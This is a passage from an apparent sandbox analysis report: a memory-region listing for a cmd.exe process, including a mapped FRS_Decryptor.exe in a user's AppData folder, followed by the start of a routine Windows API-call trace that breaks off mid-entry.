region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 207 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 208 start_va = 0xc90000 end_va = 0xc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 209 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 210 start_va = 0xcb0000 end_va = 0xcb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 211 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 212 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 213 start_va = 0x7f390000 end_va = 0x7f3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f390000" filename = "" Region: id = 214 start_va = 0x7f3b9000 end_va = 0x7f3bbfff entry_point = 0x0 region_type = private name = "private_0x000000007f3b9000" filename = "" Region: id = 215 start_va = 0x7f3bc000 end_va = 0x7f3bcfff entry_point = 0x0 region_type = private name = "private_0x000000007f3bc000" filename = "" Region: id = 216 start_va = 0x7f3bd000 end_va = 0x7f3bdfff entry_point = 0x0 region_type = private name = "private_0x000000007f3bd000" filename = "" Region: id = 217 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 218 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 219 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 220 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 221 start_va = 0xe80000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 222 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 223 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 224 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 225 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 226 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 227 start_va = 0xe90000 end_va = 0xf0dfff entry_point = 0xe90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 228 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 229 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 230 start_va = 0x7f290000 end_va = 0x7f38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f290000" filename = "" Region: id = 282 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 283 start_va = 0x1010000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 284 start_va = 0xb20000 end_va = 0xb23fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 285 start_va = 0x74820000 end_va = 0x74826fff entry_point = 0x74820000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 286 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 287 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 288 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 289 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 290 start_va = 0xb30000 end_va = 0xb33fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 291 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 292 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 293 start_va = 0xcc0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 294 start_va = 0x12e0000 end_va = 0x15b4fff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 361 start_va = 0xcd0000 end_va = 0xcd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 362 start_va = 0xce0000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 363 start_va = 0x15c0000 end_va = 0x19bbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 1283 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1284 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1285 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1286 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1287 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1288 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1289 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1290 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1291 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1292 start_va = 0x75a50000 end_va = 0x76bfcfff entry_point = 0x75a50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1293 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1294 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1295 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1296 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1297 start_va = 0xe10000 end_va = 0xe31fff entry_point = 0xe10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1298 start_va = 0x1020000 end_va = 0x11a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 1299 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1300 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1301 start_va = 0xcf0000 end_va = 0xcf0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1302 start_va = 0xd00000 end_va = 0xd00fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 1303 start_va = 0x19c0000 end_va = 0x1b40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019c0000" filename = "" Region: id = 1304 start_va = 0x1b50000 end_va = 0x2f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 1305 start_va = 0xe10000 end_va = 0xe12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 1306 start_va = 0x74600000 end_va = 0x747e5fff entry_point = 0x74600000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll") Region: id = 1307 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0xe20000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1308 start_va = 0xe30000 end_va = 0xe31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 1309 start_va = 0x74830000 end_va = 0x748a5fff entry_point = 0x74830000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1310 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 1311 start_va = 0xe40000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1312 start_va = 0xf10000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1313 start_va = 0x11b0000 end_va = 0x11b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 1314 start_va = 0x11c0000 end_va = 0x11c3fff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1315 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 1316 start_va = 0x2f50000 end_va = 0x3040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f50000" filename = "" Region: id = 1317 start_va = 0x748e0000 end_va = 0x749bafff entry_point = 0x748e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1318 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1319 start_va = 0x7f3b6000 end_va = 0x7f3b8fff entry_point = 0x0 region_type = private name = "private_0x000000007f3b6000" filename = "" Region: id = 1320 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1321 start_va = 0x744c0000 end_va = 0x745e2fff entry_point = 0x744c0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1322 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1323 start_va = 0x11d0000 end_va = 0x11d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 1324 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1325 start_va = 0x11e0000 end_va = 0x11e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 1326 start_va = 0x1200000 end_va = 0x1203fff entry_point = 0x1200000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1327 start_va = 0x1210000 end_va = 0x124efff entry_point = 0x1210000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000006.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db") Region: id = 1328 start_va = 0x1250000 end_va = 0x1253fff entry_point = 0x1250000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1329 start_va = 0x1270000 end_va = 0x1289fff entry_point = 0x1270000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000028.db" filename = "\\Users\\5JgHKoaOfdp\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000028.db" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000028.db") Region: id = 1330 start_va = 0x3050000 end_va = 0x30d2fff entry_point = 0x3050000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1331 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030e0000" filename = "" Region: id = 1332 start_va = 0x744b0000 end_va = 0x744bdfff entry_point = 0x744b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1333 start_va = 0x30f0000 end_va = 0x312ffff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 1334 start_va = 0x3130000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 1335 start_va = 0x749c0000 end_va = 0x74a58fff entry_point = 0x749c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1336 start_va = 0x7f3b3000 end_va = 0x7f3b5fff entry_point = 0x0 region_type = private name = "private_0x000000007f3b3000" filename = "" Region: id = 1337 start_va = 0x74f30000 end_va = 0x74f69fff entry_point = 0x74f30000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1338 start_va = 0x75780000 end_va = 0x7592cfff entry_point = 0x75780000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1339 start_va = 0x1260000 end_va = 0x1261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1340 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 1341 start_va = 0x3270000 end_va = 0x336ffff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 1342 start_va = 0x73fa0000 end_va = 0x73fe7fff entry_point = 0x73fa0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1343 start_va = 0x73ff0000 end_va = 0x7413cfff entry_point = 0x73ff0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1344 start_va = 0x74140000 end_va = 0x742f7fff entry_point = 0x74140000 region_type = mapped_file name = "d3d9.dll" filename = "\\Windows\\SysWOW64\\d3d9.dll" (normalized: "c:\\windows\\syswow64\\d3d9.dll") Region: id = 1345 start_va = 0x74300000 end_va = 0x7430dfff entry_point = 0x74300000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1346 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1347 start_va = 0x74320000 end_va = 0x744a9fff entry_point = 0x74320000 region_type = mapped_file name = "photoviewer.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll") Region: id = 1348 start_va = 0x748c0000 end_va = 0x748d7fff entry_point = 0x748c0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1349 start_va = 0x755b0000 end_va = 0x756fcfff entry_point = 0x755b0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\SysWOW64\\GdiPlus.dll" (normalized: "c:\\windows\\syswow64\\gdiplus.dll") Region: id = 1350 start_va = 0x7f28d000 end_va = 0x7f28ffff entry_point = 0x0 region_type = private name = "private_0x000000007f28d000" filename = "" Region: id = 1351 start_va = 0x3370000 end_va = 0x3370fff entry_point = 0x3370000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1352 start_va = 0x73f90000 end_va = 0x73f9cfff entry_point = 0x73f90000 region_type = mapped_file name = "photobase.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll") Region: id = 1353 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1354 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1355 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1448 start_va = 0x3380000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1449 start_va = 0x33c0000 end_va = 0x34bffff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 1450 start_va = 0x73e20000 end_va = 0x73f1ffff entry_point = 0x73e20000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 1451 start_va = 0x7f28a000 end_va = 0x7f28cfff entry_point = 0x0 region_type = private name = "private_0x000000007f28a000" filename = "" Region: id = 1604 start_va = 0xe40000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1605 start_va = 0xf10000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1606 start_va = 0x11d0000 end_va = 0x11d3fff entry_point = 0x11d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1607 start_va = 0x3370000 end_va = 0x3370fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003370000" filename = "" Region: id = 1608 start_va = 0x73230000 end_va = 0x733ecfff entry_point = 0x73230000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1609 start_va = 0x733f0000 end_va = 0x73608fff entry_point = 0x733f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1610 start_va = 0x73610000 end_va = 0x73731fff entry_point = 0x73610000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1611 start_va = 0x739a0000 end_va = 0x739b8fff entry_point = 0x739a0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1612 start_va = 0x7f3b6000 end_va = 0x7f3b8fff entry_point = 0x0 region_type = private name = "private_0x000000007f3b6000" filename = "" Region: id = 1613 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1632 start_va = 0x34c0000 end_va = 0x34c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034c0000" filename = "" Region: id = 1633 start_va = 0x34d0000 end_va = 0x34d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034d0000" filename = "" Region: id = 1634 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1635 start_va = 0x73e00000 end_va = 0x73e08fff entry_point = 0x73e00000 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 1810 start_va = 0x34e0000 end_va = 0x34e6fff entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 1861 start_va = 0x400000 end_va = 0x452fff entry_point = 0x400000 region_type = mapped_file name = "frs_decryptor.exe" filename = "\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe") Region: id = 1862 start_va = 0x34f0000 end_va = 0x3896fff entry_point = 0x34f0000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1863 start_va = 0x34f0000 end_va = 0x3896fff entry_point = 0x34f0000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 2 os_tid = 0xa6c [0034.717] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0034.717] __set_app_type (_Type=0x1) [0034.717] __p__fmode () returned 0x76ea1768 [0034.718] __p__commode () returned 0x76ea176c [0034.718] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0034.718] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0034.718] GetCurrentThreadId () returned 0xa6c [0034.719] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa6c) returned 0x34 [0034.719] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0034.719] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0034.719] SetThreadUILanguage (LangId=0x0) returned 0x409 [0034.721] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0034.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xc8f9d8 | out: phkResult=0xc8f9d8*=0x0) returned 0x2 [0034.721] VirtualQuery (in: lpAddress=0xc8f9e7, lpBuffer=0xc8f980, dwLength=0x1c | out: lpBuffer=0xc8f980*(BaseAddress=0xc8f000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0034.721] VirtualQuery (in: lpAddress=0xb90000, lpBuffer=0xc8f980, dwLength=0x1c | out: lpBuffer=0xc8f980*(BaseAddress=0xb90000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0034.721] VirtualQuery (in: lpAddress=0xb91000, lpBuffer=0xc8f980, dwLength=0x1c | out: lpBuffer=0xc8f980*(BaseAddress=0xb91000, AllocationBase=0xb90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0034.721] VirtualQuery (in: lpAddress=0xb93000, lpBuffer=0xc8f980, dwLength=0x1c | out: lpBuffer=0xc8f980*(BaseAddress=0xb93000, AllocationBase=0xb90000, 